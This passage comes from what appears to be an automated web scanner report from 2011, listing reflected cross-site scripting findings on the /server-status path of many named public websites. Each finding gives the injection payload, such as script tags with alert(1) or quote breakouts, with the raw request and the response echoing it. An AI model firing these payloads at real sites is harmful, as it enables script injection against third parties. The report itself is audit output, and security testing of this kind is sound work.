Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.thehollywoodgossip.com/server-statusafe50"><script>alert(1)</script>a72918afc84/" />
...[SNIP]...

2.52. http://www.thomasnet.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1503"><script>alert(1)</script>dfa9e07acd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusc1503"><script>alert(1)</script>dfa9e07acd6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomasnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:49:30 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: _tnetses=4d970d4a867a0; path=/; domain=.thomasnet.com
Set-Cookie: _usrvst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com
Set-Cookie: am1vst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: am1rm=PD; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com
Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com
Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com
Set-Cookie: referq=deleted; expires=Fri, 02-Apr-2010 11:49:29 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUS=4d970d4a8735d; path=/; domain=.thomasnet.com
Set-Cookie: us=4d970d4a8735d; path=/; domain=.thomasnet.com
Set-Cookie: GID=G13017449705538; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tinid=deleted; expires=Fri, 02-Apr-2010 11:49:29 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUID=deleted; expires=Fri, 02-Apr-2010 11:49:29 GMT; path=/; domain=.thomasnet.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<META name="y_key" content="6e6d842e318a7ef3">
<meta name="verify-v1"
...[SNIP]...
<a href="/print/screen/server-statusc1503"><script>alert(1)</script>dfa9e07acd6" onClick="dcsExternal('/link.html','TINCATL1=TNET&TINCATL2=CLICK_PRINTSCREEN','www.thomasnet.com');" target="print" rel="nofollow">
...[SNIP]...

2.53. http://www.tradekey.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8652a'-alert(1)-'6b8ddda77f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8652a'-alert(1)-'6b8ddda77f6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradekey.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:47:00 GMT
Server: Apache
Set-Cookie: PHPSESSID=dc855e24d73b067a2cc8776306294e11; path=/; domain=.tradekey.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21904

<html dir=ltr>
<head>
<title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title>
<link href="http://imgusr.tradekey.com/domains/tradekey.com/t
...[SNIP]...
ate();
   var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear();
   
   if (seconds > 1 || d == "20-01-2011")
       tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/server-status8652a'-alert(1)-'6b8ddda77f6', seconds);
}
var old_load_fx = window.onload;
window.onload = function()
{
   track_page_render_time();
   if (old_load_fx)
       old_load_fx();
}
</script>
...[SNIP]...

2.54. http://www.trails.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4043e'-alert(1)-'59bd963696c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.55. http://www.trails.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccffb'-alert(1)-'ebdf6f8cd45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.56. http://www.travelpod.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ac"><script>alert(1)</script>9a40fad7fa4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.57. http://www.uscellular.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uscellular.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 37f63</script><script>alert(1)</script>7bc3bb8d3e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status37f63</script><script>alert(1)</script>7bc3bb8d3e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscellular.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:54:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 48217


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>        
       

                   <!
...[SNIP]...
<SCRIPT type="text/javascript">

function go() {
   //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status37f63</script><script>alert(1)</script>7bc3bb8d3e1");
   var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status37f63</script>
...[SNIP]...

2.58. http://www.uscellular.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uscellular.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6218b"%3balert(1)//9c7ae4c25c7 was submitted in the REST URL parameter 1. This input was echoed as 6218b";alert(1)//9c7ae4c25c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status6218b"%3balert(1)//9c7ae4c25c7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscellular.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:54:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 48173


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>        
       

                   <!
...[SNIP]...
server-status6218b";alert(1)//9c7ae4c25c7");
   var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status6218b";alert(1)//9c7ae4c25c7")
   //alert(URL);
   window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');

}
</SCRIPT>
...[SNIP]...

2.59. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uscellular.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2130"-alert(1)-"e75eaee9692 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?b2130"-alert(1)-"e75eaee9692=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscellular.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:52:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 48179


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>        
       

                   <!
...[SNIP]...
er-status&b2130"-alert(1)-"e75eaee9692=1");
   var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&b2130"-alert(1)-"e75eaee9692=1")
   //alert(URL);
   window.open(URL,"",'width='+screen.width+',height='+screen.height+',toolbar=0,location=0,directories=0,status=0,menuBar=0,scrollBars=1,resizable=0');

}
</SCRIPT>
...[SNIP]...

2.60. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uscellular.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fe658</script><script>alert(1)</script>d0b2b654cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?fe658</script><script>alert(1)</script>d0b2b654cd4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscellular.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:52:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 48223


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>        
       

                   <!
...[SNIP]...
<SCRIPT type="text/javascript">

function go() {
   //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&fe658</script><script>alert(1)</script>d0b2b654cd4=1");
   var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/server-status&fe658</script>
...[SNIP]...

2.61. http://www.videosurf.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41715"><script>alert(1)</script>3fd18ffdef9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status41715"><script>alert(1)</script>3fd18ffdef9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videosurf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 11:33:22 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: PHPSESSID=3no1ju9s1nedevlvcvfucdru43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=45; expires=Sun, 01-Apr-2012 11:33:22 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d9709829afb1; expires=Sun, 01-Apr-2012 11:33:22 GMT; path=/; domain=.videosurf.com
Set-Cookie: luri=L3NlcnZlci1zdGF0dXM0MTcxNSI%2BPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjNmZDE4ZmZkZWY5; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta property="og:url" content="http://www.videosurf.com/server-status41715"><script>alert(1)</script>3fd18ffdef9"/>
...[SNIP]...

2.62. http://www.walletpop.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d0c"><script>alert(1)</script>ee53c632335 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status69d0c"><script>alert(1)</script>ee53c632335 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.walletpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:40:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=-%3A%3A-%3A%3A%3A%3A%3A%3A%3A%3A-; expires=Sun, 03-Apr-2011 11:40:41 GMT; path=/
Content-Type: text/html
Content-Length: 34411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/server-status69d0c"><script>alert(1)</script>ee53c632335/"/>
...[SNIP]...

2.63. http://www.washington.edu/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5bb61<img%20src%3da%20onerror%3dalert(1)>7a93292b75c was submitted in the REST URL parameter 1. This input was echoed as 5bb61<img src=a onerror=alert(1)>7a93292b75c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-status5bb61<img%20src%3da%20onerror%3dalert(1)>7a93292b75c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washington.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:39:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1179
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/server-status5bb61&lt;img src=a onerror=alert(1)&gt;7a93292b75c</b> was not found or is no l
...[SNIP]...
<br>
Reason: File does not exist: /www/world/server-status5bb61<img src=a onerror=alert(1)>7a93292b75c.</br>
...[SNIP]...

2.64. http://www.washingtontimes.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.washingtontimes.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b0e'%3bf60efb54809 was submitted in the REST URL parameter 1. This input was echoed as 12b0e';f60efb54809 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status12b0e'%3bf60efb54809 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washingtontimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 NOT FOUND
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 23106
Date: Sat, 02 Apr 2011 11:35:55 GMT
X-Varnish: 1041366891
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
   Error |
...[SNIP]...
<script type="text/javascript">
       var _gaq = _gaq || [];
       _gaq.push(['_setAccount', 'UA-3328123-2']);
       _gaq.push(['_setCustomVar', 1,'PageType', 'server-status12b0e';f60efb54809', ]);
_gaq.push(['_setCustomVar', 4,'UserSegment', 'Anonymous', ]);

       _gaq.push(['_addIgnoredOrganic', 'washington times']);
       _gaq.push(['_addIgnoredOrganic', 'the washington times']);
       _gaq.push([
...[SNIP]...

2.65. http://www.washingtontimes.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.washingtontimes.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b57fd"%3b663579dee14 was submitted in the REST URL parameter 1. This input was echoed as b57fd";663579dee14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statusb57fd"%3b663579dee14 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washingtontimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 NOT FOUND
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 23111
Date: Sat, 02 Apr 2011 11:35:48 GMT
X-Varnish: 1041366831
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>
   Error |
...[SNIP]...
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="server-statusb57fd";663579dee14";
var site="wash.times";
var zone="";
var pos="top";

window.sitepage_zone = zone;

if (17>
...[SNIP]...

2.66. http://www.wisc.edu/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisc.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a46fa--><script>alert(1)</script>0e7a0f0b634 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa46fa--><script>alert(1)</script>0e7a0f0b634 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 12:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<!--(http://www.wisc.edu/server-statusa46fa--><script>alert(1)</script>0e7a0f0b634)-->
...[SNIP]...

2.67. http://www.wisc.edu/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisc.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d885<script>alert(1)</script>591960a3e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status7d885<script>alert(1)</script>591960a3e2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 12:00:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<strong>/server-status7d885<script>alert(1)</script>591960a3e2</strong>
...[SNIP]...

2.68. http://www.wisc.edu/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wisc.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec56"><a>ec84848f36a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-statuscec56"><a>ec84848f36a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 12:00:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<input type="text" name="q" id="searchInput" value="server-statuscec56"><a>ec84848f36a" />
...[SNIP]...

2.69. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisc.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 167b7<script>alert(1)</script>b2de78620af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?167b7<script>alert(1)</script>b2de78620af=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<strong>/server-status?167b7<script>alert(1)</script>b2de78620af=1</strong>
...[SNIP]...

2.70. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisc.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c4798--><script>alert(1)</script>6e746355b62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?c4798--><script>alert(1)</script>6e746355b62=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:59:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<!--(http://www.wisc.edu/server-status?c4798--><script>alert(1)</script>6e746355b62=1)-->
...[SNIP]...

